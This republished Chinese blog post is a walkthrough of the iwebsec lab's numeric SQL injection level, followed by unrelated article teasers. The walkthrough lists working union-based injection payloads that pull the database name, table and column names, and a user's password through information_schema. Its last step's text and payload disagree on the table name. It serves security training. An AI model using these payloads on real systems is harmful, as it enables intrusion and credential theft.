iwebsec-SQL数字型注入

iwebsec-SQL数字型注入

news/2025/5/9 8:27:34/文章来源:https://blog.csdn.net/m0_60984906/article/details/146036376

1.判断是否存在漏洞

添加and 1=1发现正常显示，添加and 1=2无回显条目，则存在sql注入漏洞

2.因为有回显，尝试union联合注入，使用order by判断出有3个字段

3.使用union联合注入查看回显位，发现3三个字段均有回显，任意使用字段注入即可

4.获取数据库名

?id=-1 union select database(),2,3

5.获取表名，这时候发现如果使用1和2回显位会显示报错，那么可以使用3回显位回显

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

6.猜测用户可能存在user或users表中，先使用user表查看字段

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="user"

7.查看id=1的username和password

这里应该不是user表，真是用户存在users表，将表名改为users一样

?id=-1 union select 1,2,group_concat(username,',',password) from user where id=1

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/898332.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

蓝桥杯每日五题第一日

蓝桥杯每日五题第一日

蓝桥杯每日5题问题一班级活动 1.班级活动 - 蓝桥云课问题描述小明的老师准备组织一次班级活动。班上一共有 nn 名 (nn 为偶数) 同学，老师想把所有的同学进行分组，每两名同学一组。为了公平，老师给每名同学随机分配了一个 nn 以内的正…

阅读更多...

STM32 —— 嵌入式系统、通用计算机系统、物联网三层架构

STM32 —— 嵌入式系统、通用计算机系统、物联网三层架构

目录一、嵌入式系统的概念二、通用计算机系统与嵌入式系统的比较用途硬件软件性能与功耗开发与维护三、嵌入式系统与物联网的关系四、物联网的三层架构 1. 感知层（Perception Layer） 2. 网络层（Network Layer） …

阅读更多...

卡码网25题——掌握ACM输入输出方式（15 至 18）

卡码网25题——掌握ACM输入输出方式（15 至 18）

刷题小记： 本期涉及ACM模式下栈和链表的构建与使用，值得学习。卡玛网15.神秘字符（卡玛网15.神秘字符） 题目分析： 若给定2行字符串，其中第一个串的长度为偶数，现要求把第二个串插入到第一个…

阅读更多...

前端字段名和后端不一致？解锁 JSON 映射的“隐藏规则” ！！！

前端字段名和后端不一致？解锁 JSON 映射的“隐藏规则” ！！！

🚀 前端字段名和后端不一致？解锁 JSON 映射的“隐藏规则” 🌟 嘿，技术冒险家们！👋 今天我们要聊一个开发中常见的“坑”：前端传来的 JSON 参数字段名和后端对象字段名不一致，会发生…

阅读更多...

python中使用单例模式在整个程序中只创建一个数据库连接，节省资源

python中使用单例模式在整个程序中只创建一个数据库连接，节省资源

示例代码： from loguru import logger from pymongo import MongoClient from pymongo.errors import ConnectionFailurefrom llm_engineering.settings import settingsclass MongoDatabaseConnector:_instance: MongoClient | None Nonedef __new__(cls, *args,…

阅读更多...

AI小白的第六天：必要的数学知识（一）

AI小白的第六天：必要的数学知识（一）

在学习的过程中，不管是上代码还是理论学习，其中都掺杂了一些数学知识。俗话说“磨刀不误砍柴工”，而我已经“误了砍柴功”了，现在变成了“亡羊补牢，为时不晚”。线性代数线性代数是数学的一个分支，主要…

阅读更多...

【Linux】Bash是什么？怎么使用？

【Linux】Bash是什么？怎么使用？

李升伟整理什么是 Bash？ Bash（Bourne Again Shell）是一种命令行解释器（Shell），广泛用于 Unix 和 Linux 操作系统。它是 Bourne Shell（sh） 的增强版，提供了更多的功能…

阅读更多...

Qt Creator入门

Qt Creator入门

1.创建项目选择创建项目-Application（Qt）-Qt Widgets Application-修改名称即可默认创建有窗口类，myWidget,基类有三种选择：QWidget，QMainWindow，QDialog 注意： 名称和创建路径不能有中文、…

阅读更多...

C语言经典代码练习题

C语言经典代码练习题

1.输入一个4位数：输出这个输的个位十位百位千位 #include <stdio.h> int main(int argc, char const *argv[]) {int a;printf("输入一个４位数：");scanf("%d",&a);printf("个位：%d\n"…

阅读更多...

cls(**dict(data, id=id))灵活地从一个字典生成实例，同时确保某些关键字段（如 id）被正确设置或覆盖

cls(**dict(data, id=id))灵活地从一个字典生成实例，同时确保某些关键字段（如 id）被正确设置或覆盖

示例代码： classmethoddef from_mongo(cls: Type[T], data: dict) -> T:"""Convert "_id" (str object) into "id" (UUID object)."""if not data:raise ValueError("Data is empty.")id data.pop…

阅读更多...

MyBatis XMLMapperBuilder 是如何将 SQL 语句解析成可执行的对象？如何将结果映射规则解析成对应的处理器？

MyBatis XMLMapperBuilder 是如何将 SQL 语句解析成可执行的对象？如何将结果映射规则解析成对应的处理器？

1. XMLMapperBuilder 如何将 SQL 语句解析成可执行对象 (MappedStatement): XMLMapperBuilder 解析 <select>, <insert>, <update>, <delete> 等 SQL 语句元素时，并不仅仅是简单地读取 SQL 文本，而是要将 SQL 语句和相关的配置…

阅读更多...

咖啡点单小程序毕业设计（JAVA+SpringBoot+微信小程序+完整源码+论文）

咖啡点单小程序毕业设计（JAVA+SpringBoot+微信小程序+完整源码+论文）

✌全网粉丝20W,csdn特邀作者、博客专家、CSDN新星计划导师、java领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ 🍅文末获取项目下载方式🍅 一、项目背景介绍： 随着社会的快速发展和…

阅读更多...

003-掌控命令行-CLI11-C++开源库108杰

003-掌控命令行-CLI11-C++开源库108杰

首选的现代C风格命令行参数解析器! （本课程包含两段教学视频。） 以文件对象监控程序为实例，五分钟实现从命令行读入多个监控目标路径；区分两大时机，学习 CLI11 构建与解析参数两大场景下的异常处理；区分三…

阅读更多...

【leetcode hot 100 124】二叉树中的最大路径和

【leetcode hot 100 124】二叉树中的最大路径和

解法一：（递归）考虑实现一个简化的函数 maxGain(node)，该函数计算二叉树中的一个节点的最大贡献值，具体而言，就是在以该节点为根节点的子树中寻找以该节点为起点的一条路径，使得该路径上的节点值…

阅读更多...

谱分析方法

谱分析方法

前言本文隶属于专栏《机器学习数学通关指南》，该专栏为笔者原创，引用请注明来源，不足和错误之处请在评论区帮忙指出，谢谢！ 本专栏目录结构和参考文献请见《机器学习数学通关指南》 ima 知识库知识库广场搜索&#…

阅读更多...

在图像/视频中裁剪出人脸区域

在图像/视频中裁剪出人脸区域

1. 在图像中裁剪人脸区域 import face_alignment import skimage.io import numpy from argparse import ArgumentParser from skimage import img_as_ubyte from skimage.transform import resize from tqdm import tqdm import os import numpy as np import warnings warni…

阅读更多...

【软考-架构】11.3、设计模式-新

【软考-架构】11.3、设计模式-新

✨资料&文章更新✨ GitHub地址：https://github.com/tyronczt/system_architect 文章目录项目中的应用设计模式创建型设计模式结构型设计模式行为型设计模式 💯考试真题题外话项目中的应用在实际项目中，我应用过多种设计模式来解决不同…

阅读更多...

使用Redis如何实现分布式锁？（超卖）

使用Redis如何实现分布式锁？（超卖）

分布式锁概念在多线程环境下，为了保证数据的线程安全，锁保证同一时刻，只有一个可以访问和更新共享数据。在单机系统我们可以使用 synchronized 锁、Lock 锁保证线程安全。 synchronized 锁是 Java 提供的一种内置锁，在单个 JVM …

阅读更多...

Linux的Shell编程

Linux的Shell编程

一、什么是Shell 1、为什么要学习Shell Linux运维工程师在进行服务器集群管理时，需要编写Shell程序来进行服务器管理。对于JavaEE和Python程序员来说，工作的需要。Boss会要求你编写一些Shell脚本进行程序或者是服务器的维护，比如编写一个…

阅读更多...

使用React和google gemini api 打造一个google gemini应用

使用React和google gemini api 打造一个google gemini应用

实现一个简单的聊天应用，用户可以通过输入问题或点击“Surprise me”按钮获取随机问题，并从后端API获取回答。 import { useState } from "react"; function App() {const [ value, setValue] useState(""); // 存储用户输入的问题…

阅读更多...

最新文章